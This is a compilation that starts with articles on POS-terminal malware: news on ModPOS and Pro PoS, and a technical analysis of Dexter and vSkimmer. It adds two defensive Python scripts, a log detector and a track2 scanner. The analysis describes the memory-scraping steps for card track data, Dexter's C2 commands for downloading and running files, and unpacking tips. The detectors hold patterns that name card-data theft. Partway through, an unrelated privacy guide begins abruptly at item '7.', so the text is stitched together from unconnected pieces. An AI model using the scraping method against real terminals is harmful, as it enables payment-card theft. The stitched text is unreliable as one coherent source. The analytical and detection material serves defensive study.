BackDoor.Neutrino.50 is a multifunctional backdoor that uses exploits for the CVE-2012-0158 vulnerability during its distribution. Cases of downloading this malicious program from various sites hacked by cybercriminals have been recorded. When BackDoor.Neutrino.50 is launched, it checks for the presence of virtual machines in its environment, if any, the Trojan displays an error message "An unknown error occurred. Error - (0x [random number])", after which BackDoor.Neutrino.50 deletes itself from the system.

In addition to the functions of a Trojan for POS terminals, this backdoor has the ability to steal information from Microsoft's mail client, as well as credentials for accessing resources via FTP using a number of popular ftp clients.
In addition to directives typical for Trojan.MWZLesson, the BackDoor.Neutrino.50 Trojan can execute other commands, in particular, it is capable of carrying out several types of DDoS attacks, deleting some other malicious programs running on the infected machine, and can also try to infect computers available on the local network.

The signatures of these Trojans have been added to the Dr.Web virus databases, so they pose no threat to users of our anti-virus products.

Experts have identified several new malware samples for POS terminals

The pre-holiday season has come, the number of purchases has increased, and with it the risk of running into an unsafe PoS terminal has grown. Experts report the detection of several samples of malware that infects payment device systems. Experts generally called the ModPOS virus one of the most complex in its class.

The specialists of iSight Partners, who discovered ModPOS, called the malware "PoS malware on steroids" and one of the most difficult representatives of the "genre". And this is the opinion of a company that has been analyzing this kind of malware for over eight years! According to iSight Partners, in a massive campaign aimed at undisclosed major US retailers, ModPOS stole several million dollars from credit and debit cards.

The malware has remained out of sight of virus analysts since 2013. It is almost impossible to find references to this malware even on hacker forums.

It took the iSight Partners team more than three weeks to reverse engineer the program, and only after that they were able to get to the three ModPOS kernel modules. For comparison, recently it took their colleagues about half an hour to "open" the Cherry Picker PoS malware. iSight Partners writes that "an incredibly talented author did a great job" creating ModPOS. The company believes that the author of the virus is a resident of Eastern Europe. The experts also report that it took "a lot of time and money" to develop each of the ModPOS kernel modules.
Each of the modules behaves like a rootkit, which further complicates their analysis and reverse engineering.

To communicate with C&C servers, the malware uses 128- and 256-bit encryption and requests a unique key for each client. Because of this, it is almost impossible to understand what data was stolen. Other PoS malware typically transmits information in clear text without resorting to encryption.

A less complex, but very insidious representative of the PoS malware family was discovered by specialists from InfoArmor. The virus, dubbed Pro PoS, weighs only 76 KB. Oddly enough, this volume was enough to accommodate the functions of a rootkit and outwit virus analysts. The virus is also supposedly created by East European hackers (see screenshot below).

Pro PoS uses a polymorphic engine, that is, each malware build has a new signature. This avoids detection and overcomes security systems. InfoArmor experts warn that at the moment Pro PoS is actively used to attack major Canadian and American retail chains. Pro PoS received its last update on November 27, 2015, and its price increased at the same time. Today, a six-month malware license costs $2,600.

New threats for old PoS terminals

It would seem that not so long ago the world learned about threats specially designed for unusual computers filled with real money - ATMs. Several years have passed, and the ranks of "unusual computers" have replenished with new devices for trading and accepting payment cards - PoS terminals (point of sales, point of sale).

2013 was marked by an incident that affected US residents: the data of more than 40 million bank cards and information on more than 70 million customers of a large retail chain Target fell into the hands of cybercriminals. During the investigation, it turned out that the cause of the incident was not the compromise of the payment processing system or the company's servers, but the infected cash registers and PoS terminals.
Malicious software installed on them by cybercriminals intercepted payment data in the device's RAM in plain text. In 2014, the situation with terminals was repeated in another retail chain, Home Depot, and led to data leaks from 56 million cards.

These incidents have shown that cybercriminals are not only closely monitoring the trends in technology and devices for receiving and processing payments, but also continuously developing specialized malicious software to steal valuable financial data.

Before large-scale retail hacks, the problem of malware for PoS terminals was not so much ignored as it simply did not attract public and media attention, despite the fact that PoS malware has attacked various enterprises since at least 2010. For example, back in 2010, the world learned about Trojan-Spy.Win32.POS (also known as CardStealer), which looked for payment card details on an infected workstation and transmitted the found information to the cybercriminals' server. Since then, antivirus experts have discovered more and more instances of malware designed to steal payment data from PoS terminals every year.

Timeline of threat detection for PoS terminals (source: Kaspersky Lab)

Currently, the infection of PoS terminals has already gone beyond pinpoint attacks, and cybercriminals have received a new foothold for the implementation of threats, which allows them to get closest to other people's money.

General purpose OS against specific malware

The life of attackers is somewhat simplified by the fact that PoS devices are actually ordinary computers that can also be used (and are sometimes used, especially in small businesses) for "general purposes", including surfing the Net and checking email. This means that in some cases criminals can gain remote access to such devices.

The Dexter malware, discovered in 2012, stole bank card details by attacking POS terminals running Windows.
It infiltrated the iexplore.exe system process, read the RAM and looked for payment data sufficient to make a fake plastic card (owner's name, account number, expiration date and card number, including the issuer code, class and type of card, and so on), then sent the collected information to a remote server controlled by the attackers.

Examples of commands that Dexter received from the command and control server

During its existence, Dexter has managed to hit hundreds of PoS systems in well-known retail chains, hotels, restaurants, as well as in private parking lots. And as you might guess, most of the victims' workstations were running the Windows XP operating system.

Another notorious example is the threat dubbed Backoff. This PoS Trojan is designed to steal card information from payment terminals. Like Dexter, this malware reads the RAM of a PoS terminal to obtain payment card details. In addition, some versions of Backoff contained a component for intercepting keyboard input (keylogger), presumably in case it ends up not on a PoS terminal, but on a regular workstation, which can also be used for payments (which means that the user will enter valuable information from the keyboard).

Points of sale in "non-trade" places

Currently, PoS devices can wait for their users not only in retail chains, supermarkets or hotels. Parks and streets are full of parking payment terminals for all kinds of vehicles and cozy "booths" for fast recharging of a mobile device. Airports and train stations offer help information and pay for tickets through various devices. In cinemas, there are terminals for buying and booking tickets for film shows. In clinics and government agencies, visitors are greeted with electronic queues and receipt printing devices. In some places, even toilets are equipped with payment terminals!

At the same time, not all of these devices are sufficiently well protected.
For example, in the summer of 2014, experts from an antivirus company discovered configuration flaws in parking terminals that allowed them to compromise devices and, as a result, user data (including payment).

The application for parking meters operating on the basis of the operating system of the Windows family allows the user to register and get help information about the location of the parking meter and other bicycle parking lots. The display of all this, as well as bars, cafes and other objects, is implemented using the Google widget. The user does not have the ability to minimize the full-screen application and go beyond it, however, it is precisely in it that lies the configuration flaw that allows you to compromise the device: in the lower right corner of the widget there are links "Report a bug", "Privacy" and "Terms of use", after clicking on which will launch the Internet Explorer browser.

An example of exploiting vulnerabilities in a parking meter application

The use cases for such configuration flaws depend only on the imagination of the attacker. For example, an attacker can extract an administrator password stored in clear text in memory. You can also get a snapshot of the bike parking app's memory. It may then be possible to extract the personal information of its users from it: name, e-mail address and phone number - such a database of verified addresses and phone numbers will be of particular value on the black market of cybercriminals.
An attacker can also install a keylogger that intercepts all the entered data and sends it to a remote server, or, by adding fields for entering additional data, implement an attack scenario that will result in the receipt of even more personal data.

Default deny

Financial institutions and organizations operating PoS terminals should pay more attention to protecting their devices, and not only the security of their hardware, but also the security of their operating systems, as well as the entire network information infrastructure. This will be helped by means of protection that have long been used in corporate networks, and specialized solutions for ensuring the security of embedded systems.

Point of sale equipment is no less valuable to the owner than a lone ATM in a shopping center for the owner bank. And if the owners of ATMs with each new incident understand better that it is necessary to protect devices, then many owners of PoS terminals still pay for their carelessness. Deny by default and full disk encryption are not innovative methods, but they are still effective at protecting the iron bag of money.

Analyzing malware created for POS terminals

The malware authors do not stand still, but constantly invent new schemes to replenish their wallets. In this article, we will look at a new trend in the field of virus writing - malware for POS terminals.

What is a POS terminal?

POS is translated as point of sale, that is, the place where the client pays for goods or services. POS terminals represent a wide class of devices, and its implementation depends only on the imagination of manufacturers. For example, there are POS terminals based on the iPad. So far, virus writers for POS terminals have mastered only one platform - Windows, so this article will focus on malware specifically for that platform.

Why are POS terminals interesting to cybercriminals? The answer is simple - acquiring, that is, payment by credit card.
Despite the fact that the data security standards of the payment card industry prohibit the storage of complete card data after a successful transaction, virus writers have still found a way to get their hands on it. The fact is that in order to authorize the purchase, the POS terminal must somehow contact the processing center, and all this time the card data is in the memory of the POS terminal. This is what the attackers decided to take advantage of. Once again, I repeat that there are a lot of POS terminal implementations and this attack will not be successful on all devices.

Attackers are interested in track1 and track2 - data recorded on magnetic tape. This data contains the owner's name, card code, expiration date and other intimate information. Having track1 / track2 is enough to make a clone of a plastic card.

Dexter

In December 2012, the Israeli company Seculert announced a new malware it had detected on hundreds of POS systems around the world. One of the interesting details is that over 30% of server versions of Windows were found among the infected systems. The company provides a cloud service that helps identify malicious activity on an enterprise's network by analyzing log files generated by various software or hardware proxies (Blue Coat, Squid, and others). Unsurprisingly, she was the first to spot this threat.

Consider the files whose hashes were published by Seculert. The files are packed with a fairly popular cryptor, which uses the XPXAXCXK signature during the decompression process. This cryptor is widely used to hide from signature detection. And therefore, it is also well studied, a static unpacker has even been written for it.

However, to unpack it manually, it is enough to set a breakpoint on the VirtualAlloc WinAPI functions and trace the code until the unpacked PE file is found in one of the allocated memory regions.

After removing the cryptor, we find that three of the four files are completely identical.
The size of the first variant is only 24 KB, the file was compiled using Visual Studio, the compilation date is August 30, 2012, according to the data from the PE header. The second, more recent version was compiled on October 16, 2012, and its size is 44 KB.

Now closer to the functionality itself. The first thing Dexter does is try to inject its body and create a thread in the Internet Explorer process. Next, the malware copies itself to %APPDATA% using a random name, and is also registered in the registry key for startup. Dexter launches its own threads, which are responsible for keeping the autorun key in the registry, searching for data and injecting it into the IE process. Finally, control is passed to the code that establishes the connection and sends the collected data to the server.

To communicate with the server, Dexter uses the HTTP protocol, data is transmitted using a POST request. Before sending data to the server, Dexter encrypts it using the XOR operation and base64 algorithm. The following information is sent to the server:

  • page - bot identifier;
  • ump - collected track data;
  • unm - username;
  • cnm - computer name;
  • query - operating system version;
  • spec - "bitness" of the operating system (32 vs 64);
  • opt is the time elapsed from the previous user input of information. Retrieved using the GetLastInputInfo WinAPI function;
  • view - a list of all processes running on the infected system;
  • var is a unique string for each build;
  • val is a random string, used as a decryption key.

The server sends a response to this POST request, the header of which contains a cookie with a command to execute for the client. The command is encrypted with the same algorithm as the request. An early version of Dexter only supports two commands:

  • checkin - setting the delay period between requests to the server;
  • scanin - sets the delay period between attempts to find track data in memory.
In a later version, three more commands were added to these two:

• update - update from the specified URL;
• uninstall - remove itself from the infected computer;
• download - download and launch a file from the URL specified in the command.

In general, Dexter has a classic set of functionality for a Trojan. The only thing that makes it unique among many similar malware is its focus on stealing plastic card data. The search for track2 goes in the following sequence:

• A list of processes is compiled. System and 64-bit processes are excluded from the list.
• The WinAPI function VirtualQueryEx checks the availability of memory regions.
• An attempt is made to read memory from available regions using the ReadProcessMemory WinAPI function.
• The read buffer is searched for the = symbol, and it is also checked that there is a string of a certain length, consisting of digits, to the right and left of the symbol. The ability to store a string in both ANSI and Unicode is taken into account.
• The numbers to the left of the = symbol are checked using the Luhn algorithm.
• If the check is passed, the data is copied into a special buffer, from where it will later be sent to the server.
• After a certain period, all steps are repeated; this period can be set by a command from the server.

A later version of Dexter searches for track1 using a similar algorithm.

vSkimmer

This malware is considered to be a follower of Dexter. vSkimmer added a simple anti-debug check, implemented using standard WinAPI functions, and adds its own process to the Windows firewall's trusted processes. vSkimmer searches processes using approximately the same algorithm as Dexter, but the author did not reinvent the wheel and used regular expressions for the search.

However, among other things, vSkimmer also has interesting functionality. Obviously, the main difficulty for cybercriminals is to infect the computer that is used in the POS terminal. 
Such a computer is usually not used for browsing websites, and sometimes it has no Internet connection at all. In this case, the computer can be infected with the help of an insider in the organization. This is the mode of operation that was added to vSkimmer. If the infected computer does not have an Internet connection, the malware writes all the accumulated data to a special file. When a USB drive with the volume label KARTOXA007 is connected to the computer, vSkimmer copies all the collected information to the drive into the dmpz.log file.

The author of this malware has a good sense of humor - apparently, this explains why the value PCICompliant/3.33 is used as the User-Agent when connecting to the server. PCI Compliant is the name given to a terminal that fully complies with the data security standards of the payment card industry.

Are the ideas of these viruses so new?

Despite all the noise raised in the media and on the Internet in early 2013, a similar attack pattern was demonstrated in 2010 by Trustwave employees at DEF CON 18. In their talk "Malware Freakshow 2", they demonstrated malware that can extract track1/track2 from application memory. Presentation slides are available here.

Conclusion

Despite their primitiveness, the considered malicious programs successfully cope with the tasks assigned to them. However, in the future we may witness the use of more sophisticated software aimed at stealing data from POS terminals.

History of success

In May 2011, four Romanian citizens were formally charged with stealing plastic card data of US residents using POS terminals. According to the indictment, from 2008 to May 2011, the Romanian attackers infiltrated more than 150 POS terminals of one fast food restaurant chain, as well as POS terminals of other companies. In total, the hackers managed to steal data on more than 80 thousand plastic cards. 
To install their malware on the POS terminals, the hackers brute-forced passwords for pcAnywhere, a program used to remotely control a computer.
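Seculert found Dexter by analyzing proxy logs, and the traits described above (the ten POST field names with base64 values, and vSkimmer's User-Agent) are enough for a simple log rule. The following is an added example, not code from the original post or from Seculert; the JSON-lines log schema, the overlap threshold and all hosts and values in the sample are assumptions constructed for illustration.

```python
import base64
import binascii
import json
from urllib.parse import parse_qsl

# POST field names the article lists for Dexter's check-in request.
DEXTER_FIELDS = {"page", "ump", "unm", "cnm", "query",
                 "spec", "opt", "view", "var", "val"}
# User-Agent the article attributes to vSkimmer (compared without whitespace).
VSKIMMER_UA = "pcicompliant/3.33"
# Assumption: flag a request when at least this many of the ten names appear.
MIN_FIELD_OVERLAP = 8

# Constructed proxy log (JSON lines). Hosts, paths and values are made up;
# the log schema itself is an assumption of this example.
SAMPLE_LOG = """\
{"src": "10.20.0.15", "method": "POST", "url": "http://pos-c2.example.invalid/gw.php", "user_agent": "Mozilla/4.0", "body": "page=QUJDRA==&ump=&unm=Zm9v&cnm=YmFy&query=cXV4&spec=MzI=&opt=MTIz&view=++++&var=eHl6&val=YWJj"}
{"src": "10.20.0.22", "method": "GET", "url": "http://pos-c2.example.invalid/api/process.php", "user_agent": "PCICompliant/3.33", "body": ""}
{"src": "10.20.0.30", "method": "POST", "url": "http://shop.example.invalid/search", "user_agent": "Mozilla/5.0", "body": "page=2&query=shoes&view=grid"}
{"src": "10.20.0.31", "method": "POST", "url": "http://intranet.example.invalid/form", "user_agent": "Mozilla/5.0", "body": "page=1&ump=no&unm=bob&cnm=pc7&query=x&spec=32&opt=5&view=all&var=a&val=b"}
not-json garbage line
"""


def looks_base64(value):
    """True if value is non-empty and decodes as strict base64."""
    if not value:
        return False
    try:
        base64.b64decode(value, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def classify(record):
    """Return the list of reasons a proxy log record looks suspicious."""
    reasons = []
    user_agent = "".join((record.get("user_agent") or "").split()).lower()
    if user_agent == VSKIMMER_UA:
        reasons.append("vskimmer-user-agent")
    if (record.get("method") or "").upper() == "POST":
        fields = dict(parse_qsl(record.get("body") or "", keep_blank_values=True))
        present = DEXTER_FIELDS.intersection(fields)
        if len(present) >= MIN_FIELD_OVERLAP:
            # parse_qsl turns an unescaped '+' into a space; undo that
            # before testing, since '+' is a legal base64 character.
            nonempty = [fields[k].replace(" ", "+") for k in present if fields[k]]
            if nonempty and all(looks_base64(v) for v in nonempty):
                reasons.append("dexter-post-fields")
    return reasons


def scan(log_text):
    """Yield (source, url, reasons) for every suspicious line in the log."""
    hits = []
    for line in log_text.splitlines():
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip lines that are not valid JSON
        if not isinstance(record, dict):
            continue
        reasons = classify(record)
        if reasons:
            hits.append((record.get("src", "?"), record.get("url", "?"), reasons))
    return hits


if __name__ == "__main__":
    for src, url, reasons in scan(SAMPLE_LOG):
        print(src, url, ",".join(reasons))
```

The fourth sample line uses all ten field names with plain-text values and is deliberately not flagged, which shows why the rule checks the encoding as well as the names.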
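The digits-around-"=" test with a Luhn check that the post describes is also how card-data discovery tools find track data that should never have been written to disk. The following is an added example, not code from the original post: it scans a byte buffer (such as a log file or crash dump you are responsible for) for track2 in ANSI and UTF-16LE and reports only masked numbers. The field lengths follow ISO/IEC 7813 and, like the sample buffer built from public test card numbers, are assumptions of this example.

```python
import re

# Track 2 layout per ISO/IEC 7813: PAN (up to 19 digits), '=', expiry YYMM,
# 3-digit service code. The 13-digit minimum PAN length is an assumption.
ANSI_RE = re.compile(rb"(?<![0-9])([0-9]{13,19})=([0-9]{4})([0-9]{3})")
# Same layout when the text is stored as UTF-16LE (each char followed by 0x00).
WIDE_RE = re.compile(
    rb"(?<![0-9]\x00)((?:[0-9]\x00){13,19})=\x00"
    rb"((?:[0-9]\x00){4})((?:[0-9]\x00){3})"
)

# Constructed sample buffer using well-known public test card numbers.
SAMPLE = (
    b"2013-01-02 pos debug: swipe ;4111111111111111=25121010000012300000? ok\n"
    + "wide ;5555555555554444=26122010000045600000?".encode("utf-16-le")
    + b"\norder=4111111111111112=2512101000 (constructed, fails Luhn)\n"
    + b"ref 5555555555554444=9913201 (constructed, month 13)\n"
)


def luhn_ok(digits):
    """Luhn checksum: double every second digit from the right."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(pan):
    """Keep first six and last four digits, as PCI DSS allows for display."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track2(buf):
    """Return masked track2 findings in buf, sorted by byte offset."""
    findings = []
    for encoding, pattern in (("ansi", ANSI_RE), ("utf-16le", WIDE_RE)):
        for m in pattern.finditer(buf):
            pan, expiry, _service = (
                g.replace(b"\x00", b"").decode("ascii") for g in m.groups()
            )
            if not 1 <= int(expiry[2:]) <= 12:
                continue  # expiry month out of range: not real track data
            if not luhn_ok(pan):
                continue  # digit run that only looks like a card number
            findings.append({
                "offset": m.start(1),
                "encoding": encoding,
                "pan": mask(pan),
                "expiry": expiry,
            })
    return sorted(findings, key=lambda f: f["offset"])


if __name__ == "__main__":
    for f in find_track2(SAMPLE):
        print(f)
```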
  7. Today's material is devoted to the most common channels for transmitting information on a home or partly corporate laptop, as well as the struggle for personal safety and anonymity.

Content
1. How to protect your browser from data leaks
2. Temporary mailboxes
3. How to get a virtual number for receiving SMS
4. We introduce a ban on determining the location by MAC address
5. Is there a possibility of data leakage on VPN?
6. Checking the short URL for safety
7. Protection against web mining?
8. Configuring a VPN connection to block DNS leaks
9. The easiest ways to protect files and folders that can be found on a USB drive
10. Improving the protection and privacy of Chromium-based browsers
11. Tools used to analyze malicious links and files
12. Password security
13. Resources for end-point security testing
14. Blocking ads
Conclusion

1. How to protect your browser from data leaks

What is WebRTC?

WebRTC (Web Real-Time Communication) is an open source standard that allows real-time transmission of video and audio data through any modern browser using P2P technology.

This technology is built in and enabled by default in all modern browsers - Firefox, Chrome, Chromium, Yandex Browser and Opera.

How does WebRTC work?

With WebRTC, users of multiple browsers can transfer their data to each other. No proxy server is required to store and process data. All data processing takes place in the browser or in mobile applications.

Dangers of WebRTC Vulnerabilities and Information Leaks

The biggest danger from using WebRTC is that this web technology detects your real IP address. When your connection is directly linked to any other user, website, browser, or any mobile application, the network settings are limited. To link to audio and video, the browser must work with local IP addresses.

The best solution to protect against IP leaks is to disable WebRTC technology if you are not using it. 
Although WebRTC uses local encryption to ensure the confidentiality of communications, there is still a general consensus among security experts that the technology is less secure than conventional conferencing services. This technology poses a danger to users' browsers, which can be attacked by malware.

The aforementioned P2P technology asks for the user's real IP address when exchanging information, and WebRTC is kind enough to share this information with anyone. Even if the user is working through VPN or TOR using this miracle of technology, an attacker can easily find the user's IP address. By taking advantage of these security holes, the attacker will of course be able to figure out your real IP address.

1.1 Testing WebRTC for data leakage

WebRTC can reveal your real IP address to the sites you visit. This is a serious threat to those who use VPN services and monitor their online privacy. The problem is that users are usually not aware of this feature, and in popular browsers like Google Chrome and Mozilla Firefox, WebRTC is enabled by default. Hence, when requests are sent to STUN servers, the user's external and local IP addresses can be obtained.

To check for a WebRTC leak, connect to a VPN service and run the WebRTC leak test. A leak is identified if your real IP address is shown.

VPN is not an option either

Power users use VPN connections to hide their real IP address. Thus, in this scenario, in most cases, only the local device address assigned by the VPN will be discovered. 
However, there is a loophole that allows your real IP address to be revealed even when using a VPN service.

If you are using a proxy server, WebRTC will determine your actual proxy IP, or the VPN server IP if you are using a VPN and proxy bundle. Another reason to disable WebRTC when using a proxy is that it reduces the efficiency of the proxy connection.

1.2 Disable WebRTC in Chrome

In order to completely disable the WebRTC technology in Chrome, you can use the WebRTC Control extension. Install the extension and activate it. The plugin icon should turn blue, which means that you are now protected.

1.3 Disable WebRTC in Firefox

Firefox is one of the few browsers that allows you to disable WebRTC without installing additional plugins. If you're not using WebRTC, it's easy to disable it entirely. If you need to use it from time to time, it makes more sense to install a Firefox plugin.

To disable WebRTC in Firefox, type about:config in the address bar and press Enter. Then press with all your might on the "I'm taking risks!" button.

Enter media.peerconnection.enabled in the search bar. Select the appropriate entry, right-click and select the Toggle option. WebRTC is now disabled in Firefox. You can also install the WebRTC Control add-on to quickly enable and disable WebRTC.

1.4 Disable WebRTC in Yandex Browser

To completely abandon the WebRTC technology in Yandex Browser, you can use the WebRTC Control extension. Install the extension and enable it. The plugin icon should turn blue, which means that you are now protected from leaks.

1.5 Disable WebRTC in Opera

To completely abandon the WebRTC technology in Opera, go to Menu > Settings > Security, check the Show advanced settings box and in the WebRTC section select Disable non-proxied UDP.

2. Temporary mailboxes

For dubious sites or accounts that you will use only once, a disposable or temporary mailbox will do. 
Therefore, when you register on any site, you can specify the email address of one of your temporary mailboxes. When you receive an email with a link to confirm your registration, activate your account by clicking the link in the email. You can then close the temporary mailbox and forget about it - it will be automatically deleted after a certain period of time.

Most often, on such services, you only need to enter the username before the @ symbol, that is, the first part of the email address, after which you get access to the contents of the mailbox. There are also services that allow you to create a temporary mailbox from which mail will be automatically forwarded to your real email address.

Please note that temporary mailboxes do not require a password to access them. This is especially dangerous if emails with registration data have been sent to your inbox (as some websites do). Therefore, to increase the level of security, it is recommended to create temporary mailboxes with address names (logins) in the form of a chaotic set of characters - for example: 4edxgr083278@notagone.com or cmpiodwvexsk@yopmail.com.

2.1 Crazymailing

Crazymailing is an excellent service that provides a temporary mailbox for free. I myself use this site and it suits me perfectly. So what functionality does it provide?

• a temporary mailbox (10 minutes) with the possibility of infinite extension (press the button to the right of your temporary address and another 10 minutes are added);
• the ability to receive, write and forward messages;
• plugins for Firefox / Chrome that allow you to create a new temporary mailbox "in one click".

Also, the site has a good built-in editor and the ability to attach a file up to 10 MB to a letter. In order to prevent spam, a header with the sender's IP address is added to each sent message.

2.2 TempMail

TempMail provides a temporary mailbox for 60 minutes (renewable). There is no possibility to send letters. 
I was pleasantly pleased with the possibility of manual selection of the mailbox name and "human domain".

After the specified time has elapsed, the box can be removed. Otherwise, a simple, convenient service.

2.3 Discard.Email

Discard.Email is by far the most sophisticated temporary mail service. It provides a choice of mailbox name and domain. There are several dozen domains to choose from. Mail is stored for 30 days. What are the features of this service?

• Receive text and HTML emails with attachments
• Reading, writing and responding to emails
• Printing and saving received e-mail
• Letters are kept for 30 days
• Various domains available
• Some domains allow password protection
• Use your own domain - privately and anonymously
• Read incoming emails in RSS or ATOM feed
• Direct access to the created mailbox from bookmarks
• Managing your own spam list
• Fast delivery and receipt of letters
• Can be used on computer, tablet, smartphone

As you can see, the list of features of this service is quite long 😃 Also, Discard.Email has its own plugin for Firefox.

2.4 YOPmail

YOPmail is a disposable e-mail box service.

• a mailbox in the yopmail.com domain with a name of your choice
• random email box generator
• add-on for Firefox and Internet Explorer and widget for Opera for quick access to the mailbox
• setting up automatic forwarding from a temporary mailbox to your main email address
• alternative domains (all letters received to your temporary mailbox in any of the alternative domains are automatically forwarded to the mailbox in the yopmail.com domain)
• letters are stored for 8 days
• e-mail without a password - access to the mailbox by link or mailbox name
• your own YOPmail chat

3. How to get a virtual number for receiving SMS

To receive SMS online, there are special websites that provide a virtual number to which you can receive an SMS message. Receiving SMS over the Internet can be used primarily to increase anonymity. 
By using virtual numbers, the user can avoid being tracked online.

Here are some examples of using services to receive SMS messages:

• To receive an SMS confirmation online.
• Receiving SMS over the Internet can be used when registering on social networks such as Odnoklassniki, VKontakte, etc.
• Receiving SMS online may also be needed when registering mailboxes.

3.1 Sellaite

Let's start with the Sellaite website. This site allows you to receive SMS online for free using any of the numbers available at the time. The service does not require registration. To receive SMS online, go to the website page and click on the available number.

Remember that the SMS number provided to you may change at any time. Therefore, use it only to register accounts that do not require further confirmation or a lasting link to the number.

3.2 Receive-SMS-Online

The next site is Receive-SMS-Online. Among the possible virtual numbers, there are often Russian and Ukrainian numbers, which can be very helpful for our audience. Registration is not required to receive SMS. We go in, choose a number and send an SMS.

3.3 FreeOnlinePhone

FreeOnlinePhone - the site offers online numbers for receiving SMS. There were no Russian numbers, but the site is still working stably.

3.4 ReceiveSMSOnline

ReceiveSMSOnline is another service that offers a virtual number for free. There were delays in testing this service. From one SMS source it took about 20 minutes, from another about 30.

3.5 ReceiveFreeSMS

The next service is ReceiveFreeSMS. It offers a free virtual number. And not one number, but a whole bunch of virtual numbers from different countries.

4. We introduce a ban on determining the location by MAC address

Now we will talk about how to find out the location of a person by the MAC address of his network card.

Google Maps is a default service, which obviously means that either you use the device and consent to Big Brother receiving your geographic information, or you give up using your mobile device. 
And it's up to you to decide.

We find out the geographic location using "Mapping a web browser to GPS coordinates via router". We go to the site and at the bottom we see an unremarkable window, where we enter the MAC address of our router. A couple of seconds after entering it, the familiar Google Maps interface will appear, on which the location of your router will be marked by a point with an accuracy of almost a few meters.

How to protect yourself?

Cut off all geolocation, do not use Google Maps and do not link your photos to geolocation.

5. Is there a possibility of data leakage on the VPN?

Each user can check how effectively the chosen VPN service protects data privacy - whether it hides your real IP address, your actual location, and data about the Internet provider being used. With a VPN, it is expected that all traffic sent and received over the encrypted channel will be well protected. This includes your real IP address, your actual location, and information about the Internet service provider you are using. If this information is available to third-party resources, there is little to limit tracking of your activity, and the data about your actions can be used not only for advertising purposes.

5.1 Checking the IP address

An IP address is a unique number assigned to the router by your Internet service provider. All devices connected to the home network receive their own internal IP address: computers, smartphones, game consoles, smart devices, etc. In this case, we are interested in the public external IP address.

IP addresses are usually associated not only with Internet service providers, but also with specific locations. If a third-party service receives your IP address, it can approximate your location.

IP addresses come in several formats: IPv4 (Internet Protocol Version 4), for example , or IPv6, for example . 
To find out your IP address, enter "my IP address" in Yandex or use third-party services such as whatismyipaddress.com, whatismyip.com, or 2ip.ru. Some services not only show the address itself, but also indicate your location, determined by your IP address.

5.2 Checking for DNS Leaks

The Domain Name System (DNS) allows familiar domain names to be resolved to IP addresses. The user enters the domain name into the browser and DNS resolves it to the IP address of the corresponding web server. ISPs have their own DNS servers to simplify the conversion process - as a result, they get another way to track users.

Using a VPN means that, in theory, your internet traffic will be redirected to anonymous DNS servers. If your browser simply sends the request to your ISP, there is a DNS leak.

There are easy ways to check for a DNS leak using the Hidester DNS Leak Test, DNSLeak.com, or DNSLeakTest.com services. These sites return information about your IP address and the owner of the DNS server used. If the results show a service from your ISP, a DNS leak is occurring.

Leakage protection

When a leak is detected, there are several possible options for further action. First of all, you can change the VPN service to one that prevents DNS leaks.

You can also change the DNS servers your router uses when sending requests to the Internet. You can use alternative DNS services: Google Public DNS, Comodo Secure DNS, Norton ConnectSafe, or OpenDNS.

6. Checking the short URL for safety

URL shortening masks the full path of the original link, so its true destination is unknown. For this reason, shortened URLs need to be checked for safety.

What is the problem?

Shortened links are indispensable in applications that impose character limits. The popular microblogging service Twitter has a 280 character limit for each post. The t.co shortening service shortens links to 23 characters and can only be used by platform users. 
The links use the domain name t.co. This allows Twitter to count clicks on each link and check for malicious content. Twitter itself checks shortened URLs against blacklists of malicious sites. If the link points to possible malicious content, Twitter displays a warning.

6.1 TinyURL

TinyURL also provides a preview function. When creating a TinyURL, a preview link is available on the link page. Add the "preview" prefix in front of the TinyURL link to check the target URL.

6.2 CheckShortURL

T.co, Bitly or TinyURL links provide some security guarantees. But what about links created by other shorteners? Many sites offer a way to check shortened URLs for safety. One such site is CheckShortURL. It supports most of the popular link shortening services. Enter a short link in the search box and click Expand.

The original destination link appears on the results page. You can check the safety of a link before visiting it using public services such as Norton Safe Web.

6.3 Unshorten.It

Another site for expanding shortened URLs is Unshorten.It!. Enter the shortened link in the search box, then click the Expand button.

7. Protection from web mining?

Cryptojacking is a new type of Internet threat. This term refers to cases where websites use the computing power of site visitors' devices to mine cryptocurrencies.

The biggest problem with cryptojacking is that digital currencies are mined against the will of the user. Sites secretly run miner scripts to use the resources of visitors' computers. Users often have no way to opt out of this process, and they don't even understand what's going on.

Many web resources use miner scripts for monetization. Cryptocurrency mining operations take place in the background and do not interfere with the loading of the main site content. Browser extensions can also download cryptominers. 
They run in the background like scripts.

Checking the browser

This website - https://cryptojackingtest.com - was created by Opera Software engineers. It allows you to check the effectiveness of your browser's protection against cryptominers.

Visit the website and click the Start button to run the test. The mining process will take a few seconds. As a result, you will know for sure whether your browser is protected from web miners or not.

Miner detection in Google Chrome

Many users are often unaware that their computer is being used for unwanted mining. Typical signs of this process are computer slowdowns, freezes, or even a forced restart. If you switch to Task Manager in Windows, you will find that Chrome processes are consuming an unexpectedly large amount of CPU resources.

This way you can recognize the strange behavior of Chrome, but you will not be able to find out additional useful information: which extension or tab was using all the free CPU resources. Luckily, Google offers a built-in tool called Task Manager to help you figure it out.

Determine which sites consume a lot of CPU resources

If your Google Chrome browser is using too much CPU, the first thing to do is determine whether a site or an installed extension is causing this situation. In our example, we open a test site created by the Badpackets portal, which contains a built-in CoinHive web miner that uses up to 100% of the available CPU resources.

You can launch Task Manager in Chrome using the Shift + Esc hotkey or from the main menu: Chrome menu > More Tools > Task Manager.

Once launched, the tool will display a list of all running processes and their level of CPU consumption. For each site, extension, internal process, or subframe, a separate process is shown in the list. The user can check the list and determine which site is using the most CPU resources. 
To close this tab, select it from the list and click the End Process button. After that, the normal operation of the computer will be restored, and it will be useful to add the malicious site to the blacklists of an antivirus or ad blocker.

How to protect yourself from mining?

Users who are not protected can be given several recommendations:

• Use browser extensions to protect against miner JS scripts. For example, NoScript and uMatrix.
• Use the Opera browser with its built-in content filter, or anti-banner tools for Google Chrome, Mozilla Firefox and Microsoft Edge.
• Use antivirus to protect against miner scripts. For example, Kaspersky Free and Norton Security.
• Install an extension against miners. For example, the No Coin extension available for Google Chrome, Mozilla Firefox, and Opera.
• Disable JavaScript on questionable sites.

